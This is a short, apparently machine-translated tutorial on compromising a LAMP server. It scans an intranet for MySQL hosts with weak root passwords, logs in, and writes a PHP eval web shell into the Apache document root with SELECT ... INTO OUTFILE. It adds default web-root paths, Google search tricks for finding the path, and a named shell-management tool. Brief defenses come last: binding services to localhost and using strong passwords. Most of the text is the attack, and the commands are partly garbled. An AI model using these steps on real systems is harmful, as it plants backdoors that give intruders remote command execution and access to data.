The following uses the LAMP architecture as an example to describe the first step: Use the SQL scan tool to obtain a host with a weak password that opens port 3306 (the default port number of SQL server is 1433) on the Intranet.
Step 2: remotely log on to the host
Mysql-u root-p
Select "<? Php eval ($ _ POST ['cmd']);?> "Into outfile'X:/document root directory/xxx. php';
At this time, we encountered the first difficulty. We need to upload this Trojan to the DocumentRoot of the host, but we do not know the absolute path name !!
Try the default installation path (many servers used for testing do not modify the basic configuration)
In windows, the default path of the apache server is "C:/Program Files/Apache Software Foundation/Apache2.2/htdocs /"
In linux, the default path of the apache server is "var/www /"
In windows, the default path for using the xampp package service is "c:/Program Files/xampp/htdocs/xampp /"
Note: If the website is published on the Internet, you can use google hacker to crack the absolute path.
Site: domain name Warning
Site: www.2cto.com inurl: Warning
Step 3: Use the tool lankermicro-phpbackend customer 2.0official version .htm. You can obtain any information of the other party.
Defense measures:
1) The safest
Allow your services to only listen on the local machine and prevent others from accessing the service (or open the access permission based on the whitelist)
A. Find the line Listen 80 in the conf/httpd. conf file of apache and change it to Listen 127.0.0.1: 80.
B. Find the [mysqld] section in the my. ini file of mysql and add bind = "127.0.0.1" to port = 3306"
2) use a strong password, such as ^ mysql # xx.com. $, and install a professional password management software, such as open-source keepass.